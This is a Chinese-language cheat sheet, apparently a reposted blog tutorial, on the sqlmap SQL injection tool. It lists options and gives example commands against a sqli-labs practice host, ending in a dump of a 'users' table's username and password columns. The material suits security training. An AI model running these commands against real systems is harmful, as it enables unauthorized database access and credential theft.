SQLmap是一款自動化SQL注入神器,用于SQL注入漏洞的檢測和利用,支持多種資料庫
檢測位置
-u -- 指定url(GET請求)
-p -- 指定引數(url包含多個引數時,指定引數)
--data= -- 指定POST請求引數
--cookie -- 指定cookie引數
-r -- 從檔案中加載HTTP請求(在需要檢測的Header后面加上*)獲取資料
--dbs -- 獲取資料庫名
--tables -- 獲取表名
--columns -- 獲取欄位名
--dump -- 獲取資料
-D -- 指定資料庫
-T -- 指定表
-C -- 指定欄位其他設定
--batch -- 自動化確認
--tamper -- 指定腳本
--dbms -- 指定資料庫型別
--os -- 指定作業系統(windows/linux)
--level -- 指定探測等級(1~5)
--current-db -- 獲取當前資料庫的名字
-b -- 獲取資料庫版本資訊
-f -- 獲取資料庫指紋
--users -- 當前使用的用戶
--delay -- 設定延時
--technique -- 指定注入方式
U 聯合注入
E 報錯注入
B 布爾盲注
T 時間盲注針對不同的注入位置
GET請求注入
sqlmap -u http://192.168.40.129/sqli/Less-1/?id=1POST請求注入
sqlmap -u http://192.168.40.129/sqli/Less-11/ --data="uname=lisi"COOKIE注入
sqlmap -u xxx/index.php --cookie "uname=admin" --level 2 --dbsHTTP請求頭注入(User-agent/Referer/Cookie等HTTP Header),攔截get,post等HTTP請求,將所有請求內容復制到target.vm檔案中,在需要檢測的Header后面加上*,并且需要level>=3
sqlmap -r target.vm --level 3 --dbs獲取資料
獲取所有資料庫
sqlmap -u http://192.168.40.129/sqli/Less-1/?id=1 --batch --dbs獲取指定資料庫中的所有表
sqlmap -u http://192.168.40.129/sqli/Less-1/?id=1 --batch -D security --tables獲取指定資料庫中指定表的所有欄位
sqlmap -u http:xxx/?id=1 --batch -D security -T users --columns獲取指定資料庫中指定表中指定欄位的所有資料
sqlmap -u xxx/?id=1 --batch -D security -T users -C username,password --dumpHTTP Header頭注入
1.攔截post請求資訊,并將請求資訊的全部內容復制到檔案中,
2.在需要檢測的Header位置添加*
3.使用SQLmap對指定檔案進行檢測,SQLmap會自動檢索*,從而對目標Header進行檢測
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/292873.html
標籤:其他
上一篇:CAS底層原理和原始碼分析